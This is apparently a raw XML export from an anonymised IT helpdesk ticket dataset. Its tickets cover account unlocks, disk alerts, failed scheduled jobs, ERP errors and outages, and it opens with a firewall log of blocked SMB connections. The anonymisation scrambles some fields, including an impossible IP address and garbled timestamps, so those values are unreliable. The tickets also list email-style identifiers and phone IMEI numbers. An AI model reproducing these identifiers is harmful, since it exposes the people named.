log time: 2016-08-11 at 19:45:48 utc_x000D_
action: blocked_x000D_
cvss score: -1 _x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 537074_x000D_
inspector rule id: 186739_x000D_
inspector event id: 877942065_x000D_
ontology id: 200020003203009162_x000D_
event type id: 200020003203009062_x000D_
agent id: 103955_x000D_
_x000D_
event detail:_x000D_
aug 1sartlgeo lhqksbdx9:45:53 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58288 dst outside:192.168.54.59/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:45:53 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58289 dst outside:192.168.1.100/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:45:56 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58292 dst outside:192.168.1.87/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:45:57 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58296 dst outside:192.168.0.108/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:46:02 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/58303 to 10.33.53.207/445 flags syn on interface inside_x000D_
aug 1sartlgeo lhqksbdx9:46:04 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58305 dst outside:192.168.88.104/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:46:12 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/58316 to 10.59.24.137/445 flags syn on interface inside_x000D_
aug 1sartlgeo lhqksbdx9:46:18 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/58319 to 10.106.15.23/445 flags syn on interface inside_x000D_
aug 1sartlgeo lhqksbdx9:46:29 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58332 dst outside:192.168.21.253/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:46:30 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58334 dst outside:192.168.1.182/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:46:31 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58336 dst outside:192.168.0.109/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:46:33 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58340 dst outside:192.168.43.163/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:46:35 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58345 dst outside:192.168.43.140/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:46:38 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58351 dst outside:217.168.208.218/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:46:41 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58360 dst outside:192.168.1.13/445 by access-group "acl_inside" [0x0, 0x0]_x000D_
aug 1sartlgeo lhqksbdx9:46:43 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58365 dst outside:192.168.0.103/445 by access-group "acl_inside" [0x0, 0x0]</t>
  </si>
  <si>
    <t>unlock account  email  in cell phone the users cfgxpvzi dvpnfbrc, recsynqt byoezmla and alexandre pinto</t>
  </si>
  <si>
    <t xml:space="preserve">hello team,
could you please unlock account  email  in cell phone the users cfgxpvzi dvpnfbrc, recsynqt byoezmla and alexandfrre pintfgtyo
recsynqt.byoezmla@gmail.com id:vertiayhtu
cfgxpvzi.dvpnfbrc@gmail.com id:russoddfac
nmcxfrij.hgaxtqmy@gmail.com id:pintoddsa
</t>
  </si>
  <si>
    <t>unable to submit timecard today</t>
  </si>
  <si>
    <t>delete blancog (olifgtmpio gargtcia blagtnco)</t>
  </si>
  <si>
    <t xml:space="preserve">olifgtmpio gargtcia blagtnco does not working for company anymore since october 2013. i do not know why there is still active ad account for him.
please delete that account as soon as possible as well any other system accounts for blancog (olifgtmpio gargtcia blagtnco).
</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_1015: average (4 samples) disk free on m:\ is now 15%, which is below the warning threshold (15%) </t>
  </si>
  <si>
    <t>HostName_1015: average (4 samples) disk free on m:\ is now 15%, which is below the warning threshold (15%) out of total size 139.4 gb since 02:29pm et on 08/12._x000D_
HostName_1015:average (4 samples) disk free on c:\ is now 15%, which is below the warning threshold (15%) out of total size 100.5 gb</t>
  </si>
  <si>
    <t>HostName_236: internal error: unable to find any processes. since 07:49am et on 08/12</t>
  </si>
  <si>
    <t>HostName_236: internal error: unable to find any processes.</t>
  </si>
  <si>
    <t>HostName_1132: robot is inactive,swap memory usage, unable to find any processes, probe processes failed to start are down.</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_1132: robot HostName_1132 is inactive.._x000D_
HostName_1132:average (5 samples) swap memory usage is now 99.98%, which is above the error threshold (95%)_x000D_
HostName_1132: average (5 samples) memory usage is now 97%, which is above the error threshold (95%)_x000D_
HostName_1132: internal error: unable to find any processes._x000D_
HostName_1132: probe 'processes' failed to start (command = processes.exe) error = (1450) insufficient system resources exist to complete the requested service.  </t>
  </si>
  <si>
    <t>account unlock ybplwrez.lqcyehbf@gmail.com</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1918b</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1918b at 08/12/16 13:12:25</t>
  </si>
  <si>
    <t>ticket update on ticket_no0430054</t>
  </si>
  <si>
    <t>unable to log into my reporting_engineering_tools</t>
  </si>
  <si>
    <t>ticket update for danghtnuell</t>
  </si>
  <si>
    <t xml:space="preserve">from: rakthyesh ramdntythanjesh 
sent: friday, august 12, 2016 10:16 pm
to: bxtqducs zuhoylts
cc: pvbomqht smfkuhwi
subject: inc1538753-telephony_software is missing from pc
dear cegtcil,
danghtnuell  contacted service desk  for assistance on telephony_software issue, kindly assist user on same.
kind </t>
  </si>
  <si>
    <t>unable to view desktop items or folders</t>
  </si>
  <si>
    <t>when customer service enters an order for acct #81523266 they get the error sales office not valid for flat rate</t>
  </si>
  <si>
    <t>this is a company account with sales office = fmw1.  on 6/18/16, the shipping conditions was updated to 10 (ground) and the default carrier to tupsgrnd_x000D_
_x000D_
bob lewicki requested that i entered a ticket.  his comments :       "i believe that some logic for restricting sales offices was added so that infrastructure would not try to use flat rate, but usa should definitely not be on there. i have copied prishry and rabhtui for input. in the meantime can you please enter a ticket to get it corrected, i believe that it should be able to be adjusted in a table"</t>
  </si>
  <si>
    <t>orders from plant_74 &amp; cpp/tm warehouse will not release.   need fixed urgently</t>
  </si>
  <si>
    <t xml:space="preserve">
need urgent help!  see attached document.  example order 35804825 says shipping/receiving pt missing. erp is not recognizing these plants, getting error when trying to add plant_74 as ship/rec plant.  i have checked plant_76 &amp; plant_78 also, same problem.  </t>
  </si>
  <si>
    <t>changed laptop and need my phone activated through this pc</t>
  </si>
  <si>
    <t xml:space="preserve">please help me log into my phone system using my changed laptop. </t>
  </si>
  <si>
    <t>enable  access to erp code cv04n to view the drawing.</t>
  </si>
  <si>
    <t>crm issue</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: kpnzvsuw.lwmqyjbv@gmail.com
hello
  i do not have access to the "forcast to plan" dashbankrd in crm. see attached screenshot.
markhty dale
sales engineer, illinois (nc3)
kpnzvsuw.lwmqyjbv@gmail.com&lt;mailto:kpnzvsuw.lwmqyjbv@gmail.com&gt;
</t>
  </si>
  <si>
    <t>access request to engineering_tools</t>
  </si>
  <si>
    <t>requesting access to s:mgmt drive</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: odfimpjg.ptfoiake@gmail.com_x000D_
_x000D_
good morning:_x000D_
requesting access to the above file._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>odfimpjg ptfoiake</t>
  </si>
  <si>
    <t>unable to access emails from company ipad</t>
  </si>
  <si>
    <t>user unable to log in to outlook</t>
  </si>
  <si>
    <t>jcxwgslk szvgufir</t>
  </si>
  <si>
    <t>skype audio issues</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: qwijaspo.ukynmfig@gmail.com
dear it,
i continue to have skype audio issues.  i am unable to hear skype calls through my tablet.  when i call in, specifically when i dial into my directors call in number, i hear every third word.  i have had this issue before and had an it tech fix the issue, i will need this done again.  why does this continue to be an issue?
qwijaspo ukynmfig
sales manager - west coast
qwijaspo.ukynmfig@gmail.com&lt;mailto:qwijaspo.ukynmfig@gmail.com&gt;
</t>
  </si>
  <si>
    <t>HostName_770:average (4 samples) disk free on g:\ is now 8%</t>
  </si>
  <si>
    <t>HostName_770:average (4 samples) disk free on g:\ is now 8%, which is below the warning threshold (15%) out of total size 200.0 gb</t>
  </si>
  <si>
    <t>engineering tool doesn't work</t>
  </si>
  <si>
    <t xml:space="preserve">network outage:russia - warehouse:site is down since at 9:24 am et on 08/12.no backup </t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ____9:24 am et on 08/12__________________x000D_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</si>
  <si>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the pc projector in einstein conf room is not working, it is on but getting no video on the screen.</t>
  </si>
  <si>
    <t>zlpdkqsw jxabdocs</t>
  </si>
  <si>
    <t>unable to create delivery for material mm 7150506 against so 35689265 l20.  material completed 11-aug.</t>
  </si>
  <si>
    <t>please assign to erp supply_chain team.   apo and ecc systems require synchronization so that a delivery can be created.  material is needed to ship today, 12-august.</t>
  </si>
  <si>
    <t>company mails on mobile phone</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ctuodmai.vguwqjtd@gmail.com_x000D_
_x000D_
hello,_x000D_
pl let me know the process to install and start the access of official mail in my smart phone._x000D_
phone details as below._x000D_
_x000D_
make: oppo_x000D_
build number: x9009ex_11_a.19_160711_x000D_
imei 1 : 869770024432450_x000D_
imei 2 : 869770024432443_x000D_
_x000D_
duel sim mobile._x000D_
_x000D_
pl let me know any other details needed._x000D_
_x000D_
_x000D_
à²•à³ƒà²¤à²œà³à²žà²¤à³†à²—à²³à³ / </t>
  </si>
  <si>
    <t>ctuodmai vguwqjtd</t>
  </si>
  <si>
    <t>impact awards//password reset</t>
  </si>
  <si>
    <t>network outage:usa refinery - (company):site is hard down since at 9:58 am et on 08/12.no backup circuit.</t>
  </si>
  <si>
    <t>what type of outage:  _x____network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ____9:58 am et on 08/12__________________x000D_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</si>
  <si>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replace internal speakers on e7350 due to crackling issue</t>
  </si>
  <si>
    <t>material posting on production order does not balance requirement quantity on order, does not post on qty withdraw</t>
  </si>
  <si>
    <t xml:space="preserve">in switzerland, cc 5443: we post material consumption on po 226733620, mat.post. number 5042203075. the material has been discounted in stock and batch, but not posten on the production order (does not show up in the bill of materials)
there are several orders suffering this problem. we need it solved aerp.
contact: brjkmwvo odxwcpie </t>
  </si>
  <si>
    <t>discounts</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: peojqgvm.qayeptuo@gmail.com_x000D_
_x000D_
i am having problems submitting a discount_x000D_
_x000D_
here is the screen shots im getting_x000D_
_x000D_
_x000D_
_x000D_
[cid:image001.jpg@01d1f475.30085b20]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[cid:image002.jpg@01d1f475.30085b20]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>dell 2in1 7350 device has not been booting despite multiple attempts for a reset or reboot</t>
  </si>
  <si>
    <t xml:space="preserve">dell 2in1 7350 device has not been booting despite multiple attempts for a reset or reboot_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to view credit card statement on ess</t>
  </si>
  <si>
    <t>msbwrchi kdbxtmoq</t>
  </si>
  <si>
    <t>erp newweaver business client locked out.</t>
  </si>
  <si>
    <t>mqjdyizg amhywoqg</t>
  </si>
  <si>
    <t>the computer for mii at us_plant facility has got thrown out of company domain</t>
  </si>
  <si>
    <t>the computer for mii has got thrown out of company domain_x000D_
_x000D_
please contact ms. dpuifqeo eglwsfkn for further info</t>
  </si>
  <si>
    <t>network response time</t>
  </si>
  <si>
    <t>at about 8:20 am eastern daylight time, i was on a conference call with usa. the call started dropping out and the only reason i can come up with is a network bottleneck. want to prove or disprove by finding out about the network traffic levels between usa and usa and between usa and the internet during the time the call was made.</t>
  </si>
  <si>
    <t>qipzctgs wjhtbpfr</t>
  </si>
  <si>
    <t>ticket update for an account lockout</t>
  </si>
  <si>
    <t>hejsrtpz pxqwbulg</t>
  </si>
  <si>
    <t>urgent !! need access to all the accounts in iowa, minnesotta, south dakota within crm</t>
  </si>
  <si>
    <t>need access to all the accounts in iowa, minnesotta, south dakota within crm</t>
  </si>
  <si>
    <t>issue executncqulao qauighdpss programdntys in erp when working on vpn_ _urgent</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rcbdyslq.zuspjbtw@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i have issue when i'm working on vpn form home._x000D_
i 'm not able to run mass programdntys in erp when i'm on vpn. last weekend i had to run mass programdnty to add partners in erp but i was not able. i thought it was security issue but i checked that with security erp team._x000D_
i made uacyltoe hxgaycze when i was in the office and it is working but i can't do the same at home working on vpn._x000D_
_x000D_
_x000D_
please check with high priority!_x000D_
</t>
  </si>
  <si>
    <t>discounts error</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: itslpwra.vybdkuoa@gmail.com_x000D_
_x000D_
[cid:image001.png@01d1f46f.7c80d460]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>reset the password for yimwfntl rkdwohas on erp / production / erp</t>
  </si>
  <si>
    <t>while trying to log the erp part of erp fro the first time. it would not accept my password and locked me out of the system.</t>
  </si>
  <si>
    <t>yimwfntl rkdwohas</t>
  </si>
  <si>
    <t>update cutview to lauacyltoe hxgaycze version</t>
  </si>
  <si>
    <t>update cutview to lauacyltoe hxgaycze version and adjust to current ms office installation</t>
  </si>
  <si>
    <t>wi-fi at msg sales not working</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: tbloeczi.gxlmeyph@gmail.com_x000D_
_x000D_
it-help desk,_x000D_
_x000D_
we are unable to connect to wi-fi at msg sales since last two/three weeks._x000D_
_x000D_
please note, when this was in lotus discussion room, it was working fine and we could connect the same. however now after it has been shifted to msg sales about month back, we are unable to connect._x000D_
please check and restore at the earliest._x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>tbloeczi gxlmeyph</t>
  </si>
  <si>
    <t>when i launch collaboration_platform, my internet browser (ie) will not launch.  others around me are experiencing the same thing.</t>
  </si>
  <si>
    <t>update installation for cutview</t>
  </si>
  <si>
    <t>xcfjusyp glbzpedq</t>
  </si>
  <si>
    <t>unlock account  email  in cell phone the user luciano amadeu and zpfitlyu cemvwyso</t>
  </si>
  <si>
    <t xml:space="preserve">hello team,_x000D_
_x000D_
could you please unlock account  email  in cell phone the user luciano amadeu and zpfitlyu cemvwyso_x000D_
_x000D_
iaxyjkrz.pctnvdrm@gmail.com id: eulalla_x000D_
_x000D_
zpfitlyu.cemvwyso@gmail.com id: silvaes_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>csscdrill model on configair server not working in SID_34 production</t>
  </si>
  <si>
    <t>csscdrill model on configair server not working in SID_34 production:_x000D_
when starting the csscdrill model from a standard reference product the server responses "500 internal server error" -   error: while trying to invoke the method java.util.list.iterator() of a null object loaded from local variable 'locallist'._x000D_
when starting the csscdrill model from scratch (w/o selecting a standard reference product) configair comes up, but it does not allow me to complete a good configuration._x000D_
the same csscdrill model is working fine in SID_1 uacyltoe hxgaycze environment._x000D_
_x000D_
the mill_model model is working fine in SID_1 and SID_34.</t>
  </si>
  <si>
    <t>lhqsm519:average (4 samples) disk free on h:\ is now 12%</t>
  </si>
  <si>
    <t>average (4 samples) disk free on h:\ is now 12%, which is below the warning threshold (15%) out of total size 200.0 gb</t>
  </si>
  <si>
    <t>news can not be opened</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uwofavej.hxyatnjc@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
since some days, when the regional news moved to first page of hub, again &amp; again, â€žnews" appear with out â€žmore" to open it or a link in the heading_x000D_
_x000D_
this screen print is just before i wrote this email_x000D_
_x000D_
_x000D_
_x000D_
[cid:image001.png@01d1f491.67af6c00]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>replace button is missing on dialog box in shopping basket</t>
  </si>
  <si>
    <t>replace button is missing on dialog box in shopping basket when you click on status indicator and msg displays there is a replacement, 'replace' button is missing.  needs to be same as on other grid pages</t>
  </si>
  <si>
    <t>outlook is not functioning.</t>
  </si>
  <si>
    <t>quxwtbcr imdwuhbz</t>
  </si>
  <si>
    <t>enhancement of storage capacity</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ihmbfeoy.exbgcfsk@gmail.com_x000D_
_x000D_
dear sir,_x000D_
_x000D_
we do not have sufficient space of following drives in server. request you to enhance the storage capacity of these drives._x000D_
_x000D_
_x000D_
01)   mtbu_ele(\\HostName_95&lt;file:///\\HostName_95&gt;)_x000D_
_x000D_
02)   eplan vault(\\HostName_97&lt;file:///\\HostName_97&gt;)_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ihmbfeoy exbgcfsk</t>
  </si>
  <si>
    <t>mouse issue</t>
  </si>
  <si>
    <t xml:space="preserve">mouse is not working </t>
  </si>
  <si>
    <t>wrxikemh uqblenpc</t>
  </si>
  <si>
    <t>12th aug ,friday on-call - basis</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: mnxbeuso.rfmdlwuo@gmail.com
dac / gso team â€“
please note the on-call primary/secondary details only for today 12th aug 2016, friday between 23:30 ist to 13th aug 2016, saturday 07:00 ist.
primary â€“ krisyuhnyrt juvfghtla
secondary â€“ thomklmas kahtuithra
</t>
  </si>
  <si>
    <t>mandatory condition mwst is missing for order 35805176 customer master 70928858</t>
  </si>
  <si>
    <t xml:space="preserve">could you please check what is wrong with customer master 81039969? we can't create delivery because there are incomplete log -pricing error: mandatory condition mwst is missing_x000D_
we check with pricing department and mwst is defined for this customer corretly,_x000D_
_x000D_
there should be  tax like for turkey tr "tax free trade zone" because customer is from  azerbaijan, maybe has to be added some condition for this country also,_x000D_
_x000D_
we have to ship the tools today because it is new order form new distributor with big potential, so priority -2 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_499</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_499 at 08/12/16 04:40:25</t>
  </si>
  <si>
    <t>setup new ws\svuxjkpg tpurnjvi</t>
  </si>
  <si>
    <t>svuxjkpg tpurnjvi</t>
  </si>
  <si>
    <t>setup new ws \xovczlad fkicawph</t>
  </si>
  <si>
    <t>xovczlad fkicawph</t>
  </si>
  <si>
    <t>ak - crm in outlook not working</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wdpzfqgi.zndgqcux@gmail.com
hello,
can you please help me to solve the following issue?
1.      whenever i want to start outlook, then i get this microsoft dynamics crm message.
2.      in order to proceed further i have to click Â´Â´stornoÂ´Â´= cancel severeal times (2x or 3x)
3.      then the outlook is opened, but there is no connection with crm, which i need.
[cid:image002.jpg@01d1f482.68356731]
s pofgtzdravem / kind </t>
  </si>
  <si>
    <t>setup new ws \bzekndcu ivhnpdbu</t>
  </si>
  <si>
    <t>bzekndcu ivhnpdbu</t>
  </si>
  <si>
    <t>setup laptop fÃ¼r sandstrahlgerÃ¤t und roboworker\qidgvtwa qvbutayx</t>
  </si>
  <si>
    <t>setuplaptop fÃ¼r sandstrahlgerÃ¤t und roboworker\qidgvtwa qvbutayx</t>
  </si>
  <si>
    <t>mobiltelefon lautsprecher / mikrofon defekt / gestÃ¶rt</t>
  </si>
  <si>
    <t>durchwahl -477_x000D_
mobilteil gigaset sl2_x000D_
lautsprecher / mikrofon kratzen bzw. setzten zeitweise aus</t>
  </si>
  <si>
    <t>tblmnxez ulcmryaf</t>
  </si>
  <si>
    <t>can you please help</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: smktofel.etsoirbw@gmail.com_x000D_
_x000D_
hiï¼Œ_x000D_
_x000D_
i want to know how to run the report from finance_app regarding the report of allocation key for cost centers being allocated to different bu, can you please help?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to upload engineering_tool</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ftsqkvre.bqzrupic@gmail.com_x000D_
_x000D_
dear sir_x000D_
_x000D_
i am unable to upload engineering_tools, the error is showing not connected to the server but application shows connected status. please see the screen shot for your ref._x000D_
_x000D_
[cid:image001.png@01d1f49b.61c1bcd0]_x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>password does not work it says 'account is disabled'</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_2049</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_2049 at 08/12/16 02:57:25</t>
  </si>
  <si>
    <t xml:space="preserve">vendor payment through bank </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: gnasmtvx.cwxtsvkm@gmail.com
hi pradtheyp/nathyresh
with effect from tuesday(ie 16.08.2016), we propose make all  vendor payments through bank. in order to facilitate  this process you are requested to make the following changes in the vendor master for all domestic vendors. ( list is enclosed)
1)      house bank id to be changed from itelephony_softwarei bank to bank of amerirtca
2)      method of payments should be a,w &amp; c
3)      e mail address to be updated in correspondence internet id
once the changes are made, please confirm so that we can initiate the first payment to vendors through bank.
</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1960</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1960 at 08/12/16 02:01:24</t>
  </si>
  <si>
    <t>problem in calling through skype</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ftgvlneh.aitsgqwo@gmail.com
dear sir,
i am facing problems while individual calling as well as attending meetings on skype.
whenever i am trying to connect, it is coming "not responding" and skype-app is getting closed &amp; signed out.
request to pl. resolve the same.
for company
ftgvlneh aitsgqwo
asst. mngr. sales â€“ north ( msg)
ftgvlneh.aitsgqwo@gmail.com&lt;mailto:ftgvlneh.aitsgqwo@gmail.com&gt;
</t>
  </si>
  <si>
    <t>erp routing logic missing for the infrastrcture npr forms.</t>
  </si>
  <si>
    <t xml:space="preserve">pls add the below data in the zsd100 and determine the logic through region._x000D_
_x000D_
apac = 51113201 csd_ap_xz    custom solution earth cutting_x000D_
germany = 51111840        csd_na_bdc    bdc usa custom solutions_x000D_
australia = 51112576 csd_aus_drum drum jobs australia_x000D_
poland = 51111844 eng_emea_pz  poland quotes/orders eng programdnty eng_x000D_
amerirtcas = 51111840        csd_na_bdc    bdc usa custom solutions_x000D_
south africa = 51113351 csd_emea_sa  south africa purchasing_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>incorrect  tax code in mm</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
we understand from  order booking team that   while  booking order   since yesterday ,   they have come across    many mm's with '0' tax rate  ._x000D_
_x000D_
material country jivp jivc csr name prod. hierarchy_x000D_
6740704 in 2 2 chandmt t0130sww0ah2_x000D_
5146604 in 2 2 chandmt t0130pssh0ru_x000D_
4869277 in 2 2 chandmt t0130sww0ah2_x000D_
5146697 in 2 2 chandmt t0130pssh0ru_x000D_
_x000D_
list of few items which has '0' tax rate  is given above _x000D_
_x000D_
at present they are booking order   with correct  tax rate  in oa ._x000D_
_x000D_
request your assistance    in resolving this   on top priority as we  have put on hold all invoicing   . _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>need help in reset password in password_management_tool password manager</t>
  </si>
  <si>
    <t>abended job in job_scheduler: bkbackup_tool_reporting_tool_prod_inc</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: bkbackup_tool_reporting_tool_prod_inc at 08/12/16 00:14:27</t>
  </si>
  <si>
    <t>abended job in job_scheduler: bkbackup_tool_HostName_771_prod_full</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: bkbackup_tool_HostName_771_prod_full at 08/12/16 00:06:27</t>
  </si>
  <si>
    <t>account lokced in erp SID_34</t>
  </si>
  <si>
    <t>vtbqgwnk tamfbgjy</t>
  </si>
  <si>
    <t>recall: ticket_no1536413 -- comments added</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: franhtyu.liu@company.com_x000D_
_x000D_
franhtyu liu would like to recall the message, "ticket_no1536413 -- comments added"._x000D_
_x000D_
_x000D_
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é™¤ã€‚_x000D_
[_x000D_
select the following link to view the disclaimer in an alternate language. </t>
  </si>
  <si>
    <t>vblmcyax vlaorjum</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_38hotf</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_38hotf at 08/11/16 23:06:26</t>
  </si>
  <si>
    <t>issue with bex,business_client</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ypuaejsc.yoxrqtsn@gmail.com_x000D_
_x000D_
dear sir/madam,_x000D_
_x000D_
i am not able to access bex as well as business_client._x000D_
_x000D_
pl rectify immediately. its urgent._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>required 20 gb additional memory in e drive for server HostName_1042 _ please check attachment</t>
  </si>
  <si>
    <t>rjlnszei kneatvfu</t>
  </si>
  <si>
    <t>m drive access</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: uisewznr.ewtmkphs@gmail.com
hi team,
i have lost access to the m drive on my computer. please see the screenshots below. this same issue is occurring for walfgtkek and tagsyrhu. can you please arrange for this access to be reinstated? </t>
  </si>
  <si>
    <t>circuit outage : usa secondary circuit is down since 06:28pm et on 08/11</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _____06:28pm et on 08/11_________________x000D_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_yes_______     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  __email_______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</si>
  <si>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abended job in job_scheduler: Job_1623</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1623 at 08/11/16 18:26:27</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1488</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1488 at 08/11/16 18:22:27</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1491</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1491 at 08/11/16 18:22:27</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1493</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1493 at 08/11/16 18:22:27</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_2114 at 08/11/16 17:32:26</t>
  </si>
  <si>
    <t xml:space="preserve">unable to access emails </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: hr_tooldcvcgenratn at 08/11/16 17:02:26</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_2318</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_2318 at 08/11/16 17:01:26</t>
  </si>
  <si>
    <t>please provide the following:_x000D_
_x000D_
what order number?  35853596_x000D_
_x000D_
what material or item number?  10_x000D_
_x000D_
what warehouse location?   plant_123_x000D_
_x000D_
issue description / error message?   value of modific counter for document 35853596 in supply_chain is 1, but should be 6</t>
  </si>
  <si>
    <t>erp is down - distributor_tool / company center customers are not able to place transactions</t>
  </si>
  <si>
    <t xml:space="preserve">erp is down - distributor_tool / company center customers are not able to place transactions.  customer service is not able to place transactions in ecc </t>
  </si>
  <si>
    <t>md04, display stock, is locking up with create delivery, 30min to 1hr, had to close out window, still didnt process</t>
  </si>
  <si>
    <t>the window is locked up, can't do screenshots, just a spinning circle</t>
  </si>
  <si>
    <t>wkeiqpud dzgemhbk</t>
  </si>
  <si>
    <t>erp down</t>
  </si>
  <si>
    <t xml:space="preserve">user id - vaugtyghtl
issue - erp down
location - usa
no of users affected - 15+
system - erp SID_34 erp production
issue - just clocking
contact no - 
server name - HostName_196
transaction - md04.
</t>
  </si>
  <si>
    <t>mobile device activation
name:mikhghytr karaffa
language:
browser:microsoft internet explorer
email:vfrdxtqw.jfbmsenz@gmail.com
customer number:
telephone:
summary:requesting email to my personal iphone.</t>
  </si>
  <si>
